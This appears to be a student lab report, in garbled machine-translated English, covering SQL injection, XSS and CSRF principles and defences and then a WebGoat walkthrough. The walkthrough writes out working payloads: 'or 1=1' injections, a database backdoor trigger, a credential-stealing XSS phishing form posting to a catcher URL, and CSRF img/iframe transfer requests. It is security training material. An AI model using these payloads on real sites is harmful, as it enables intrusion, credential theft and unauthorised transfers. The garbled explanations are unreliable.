First, the basic questions answered
1.SQL injection attacks principle, how to defend?
- Principle: SQL injection, is inserted into a Web form to submit the query string or enter a domain name or page request through the SQL command, ultimately to deceive server to execute malicious SQL commands.
sql injection attacks is the use refers to the use of loopholes in the design, operation Sql statement on the target server as well as other means of attack, no user input data to verify that the main reason for Sql injection attack to succeed dynamically generated Sql statement. Such as: user name, password input box, enter registration number ', -, #, and other special characters, quotation marks to achieve closure, the comment section SQL statement, using the style never really realized login information for display purposes. - Defense:
turn off or delete unnecessary interactive submit the form page;
vulnerabilities related to the injection point code filter keyword (such as: the use of regular expressions) to standardize the code security;
do not place the backup file on the server side to avoid being infection, or backup files contain loopholes, causing the starting point;
the contents of the database is encrypted so that it does not have a special significance.
Principle 2.XSS attack, how to defend? - Principle: XSS: Cross site scripting. An attacker who exploited the vulnerability site (usually these vulnerabilities that a site is not well spooler to filter user input), the input can be displayed on the page, the impact on other users of the HTML code; due to the victim's browser to the target trusted servers, when its access to the target server is inject malicious script: the page (such as html tag or javascript code) of this malicious script can be successfully implemented, achieve the purpose of obtaining the user cookie and can take advantage of user identity for illegal operations.
- Defense:
user perspective: raise awareness, Do not enter personal information, such as user name and password;
web authors point of view:
the input parameters and URL filtering
to encode the character of potential threats before the output data, escaping
3.CSRF attacks, how to defend? - Principle:
CSRF: Cross-site request forgery.
CSRF is false login. The core essence of cross-site forgery request steal user Session, or Cookie, because the current situation Session are the mainstream in the presence of Cookie attacker does not care about the victim's specific account and password, because once the user login, the user is Session the only evidence, as long as the attacker can get Session, can be disguised as the victim into the server.
mainly when accessing the site a to enter a user name and password, after validation, site a generates Cookie information and return, then visit the website a success, normally send a request to the site A. Before the exit site is not A, B when accessing another, Site B may return some attack code and request access to website A; thus, at the request of the site B, to the requesting site A. A Web site but do not know the request is malicious, so it will execute the malicious code - Defense:
Verify Token request
verification Referer
added plus the verification
set cookie domain
Practice
(A) mounting WebGoat
1. Download webgoat-container-7.0.1-war- exec.jar file
2, the command in the directory containing the file java -jar webgoat-container-7.0.1-war-exec.jaroperation WebGoat, message: Starting ProtocolHandler [ "http-bio -8080"] Description on successful, the experiment can not be closed terminal
3, enter in your browser http://localhost:8080/WebGoatto enter the login screen WebGoat
4, use the default user name and password to login guest
SQL attacks
- 1.Numeric SQL Injection
Right-click on the page, select inspect Element review page elements to modify the source code, add or 1 = 1 in the selected city number Value values:
A successful attack displays weather conditions all cities of:
2.Log Spoofing
use the carriage return (0D%) and newline (% 0A), fill in the usernamezch%0d%0aLogin Succeeded for username: admin, the attack is successful:
3.String SQL Injection
input according to the subject requirements: Smith. You can see related information query, statementSELECT * FROM user_data WHERE last_name = 'Smith'
Wing injection true formula '1 = or' 1 attack was successful:
- 4.LAB: SQL Injection
Stage 1: SQL Injection String:
Enteror 1=1 --SQL injection, failed; see the source code found on the input length limit, modify the source code again injected success.
- 5.Database Backdoors
first to test the statement, enter 101 in the `user ID; update employee set salary = 5000, you can see the updated data
Implanting 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='[email protected]'WHEREuserid = NEW.useridcreate a back door:
XSS attacks
- 1.Phishing with XSS
in the search box direct input to be xss attack code. Preparation of reference, add a form that allows the user to enter a user name and password, and then make this information can be sent to the site and displayed:
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>Click on search, a form appears, enter the information, the attack is successful:
2.Stored XSS Attacks
create illegal message content, can lead to unintended loading pages or other content when users visit; named title, enter a string js code in the message:<script>alert("boy next door");</script>Click on the post you just created, pop-up window
3.Reflected XSS Attacks
After you enter the wrong user information, the server checking a mistake, an error is returned and the error page content presentation. If you enter a URL attack will return to that information. Enter, submit:
CRSF attacks
1.Cross Site Request Forgery (CSRF)
write a URL into the Message box, not visible to other users, set a hidden picture, once the user clicks it will trigger a CSRF event; in Message, enter<img src="http://localhost:8080/WebGoat/attack?Screen=&menu=900&transferFunds=5000" width="1" height="1" />;click on the message, the page will Download this message and displays, users will perform turn away deposits.
- Prompt By-Pass 2.CSRF
the Message box, enter:
<iframe src="attack?Screen=[scr]menu=[menu]&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=[scr]&menu=[menu]&transferFunds=CONFIRM"> </iframe>View messages, see Transfer news:
